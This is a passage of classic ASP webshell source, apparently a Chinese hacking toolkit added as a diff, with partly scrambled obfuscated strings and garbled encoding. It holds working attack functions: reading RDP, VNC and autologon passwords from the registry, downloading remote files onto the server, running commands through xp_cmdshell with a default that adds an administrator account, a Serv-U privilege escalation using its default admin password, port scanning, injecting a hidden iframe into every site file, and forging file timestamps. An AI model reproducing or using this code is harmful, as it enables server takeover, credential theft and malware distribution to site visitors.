Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user 80sec 80sec /add & net localgroup administrators 80sec /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:
+:Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>��*�</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user 80sec 80sec /add & net localgroup administrators 80sec /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·?q��:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+FuncTion su7()
+response.write"<form name='form1' method='post' action=''>"
+response.write"<p align='center'>"
+response.write"------------------Serv-U Information------------------"
+response.write"<br>"
+response.write"user:"
+response.write"<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+response.write"pwd :"
+response.write"<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+response.write"port:"
+response.write"<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+response.write"---------------------Add User!!! ---------------------<BR>"
+response.write"Domain: &nbsp; "
+response.write"<input name='domain' type='text' class='TextBox' id='domain' value='80sec' /><br>"
+response.write"FTP USER:"
+response.write"<input name='fuser' type='text' class='TextBox' id='fuser' value='80sec'><br>"
+response.write"FTP PASS:"
+response.write"<input name='fpass' type='text' class='TextBox' id='fpass' value='123456'><br>"
+response.write"FTP PORT:"
+response.write"<input name='fport' type='text' class='TextBox' id='fport' value='21'><br>"
+response.write"FTP PATH:"
+response.write"<input name='fpath' type='text' class='TextBox' id='fpath' value='c:\\'>"
+response.write"<br>"
+response.write"Privilege"
+response.write"<select para=value name='privilege'>"
+response.write"<option value=2>Read-only Admin</option>"
+response.write"<option value=3>Group Admin</option>"
+response.write"<option value=4>Domain Admin</option>"
+response.write"<option value=5>System Admin</option>"
+response.write"</select>"
+response.write"</p>"
+response.write"<p align='center'>"
+response.write"<input name='radiobutton' type='radio' value='add' checked class='TextBox'>"
+response.write"Add User "
+response.write"<input type='radio' name='radiobutton' value='del' class='TextBox'> "
+response.write"Del User </p>"
+response.write"<p align='center'>"
+response.write"<input name='Submit' type='submit' class='buttom' value='Run' />"
+response.write"</p>"
+response.write"</form>"
+user = request.Form("duser")
+pass = request.Form("dpwd")
+port = request.Form("dport")
+domain = request.Form("domain")
+fuser = request.Form("fuser")
+fpass = request.Form("fpass")
+fport = request.Form("fport")
+fpath = request.Form("fpath")
+privilege=request.Form("privilege")
+select case privilege
+   case 2:
+  privilege="ReadOnly"
+   case 3:
+  privilege="Group"
+   case 4:
+  privilege="Domain"
+   case 5:
+  privilege="System"
+  end select
